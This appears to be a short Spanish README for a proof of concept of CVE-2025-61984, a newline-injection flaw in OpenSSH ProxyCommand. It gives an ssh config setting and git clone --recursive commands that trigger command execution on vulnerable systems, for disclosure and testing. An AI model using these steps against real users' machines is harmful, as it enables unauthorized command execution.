
Prueba de concepto que demuestra una vulnerabilidad de inyección de nueva línea en OpenSSH ProxyCommand (CVE-2025-61984), que permite la inyección de comandos mediante una configuración SSH manipulada.
Esta es una prueba de concepto que utiliza un salto de línea para confundir el ProxyCommand de OpenSSH <10.1. Artículo completo.
Configura un .ssh/config que contenga:
Host *.example.com
ProxyCommand some-command %r@%h:%p
(El comando no importa, solo necesita un %r sin comillas en los argumentos en algún lugar).
Luego ejecuta (para bash):
$ git clone --recursive https://github.com/dgl/cve-2025-61984-poc
O si usas fish como $SHELL:
git clone --recursive -b fish https://github.com/dgl/cve-2025-61984-poc
Si no usas esa shell pero quieres probar esto, puedes hacer:
$ SHELL=/bin/bash git clone --recursive https://github.com/dgl/cve-2025-61984-poc